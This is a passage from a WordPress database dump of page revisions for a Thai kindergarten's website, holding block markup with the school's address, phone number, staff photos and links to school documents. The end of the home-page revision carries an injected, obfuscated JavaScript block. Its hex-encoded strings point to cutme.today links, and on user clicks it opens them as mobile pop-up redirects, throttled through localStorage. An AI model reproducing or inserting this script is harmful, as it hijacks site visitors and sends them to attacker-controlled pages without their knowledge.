width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:19:10','2025-07-15 07:19:10','',19,'http://watprato.ssk.in.th/?p=675',0,'revision','',0),
(676,1,'2025-07-15 14:21:57','2025-07-15 07:21:57','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap 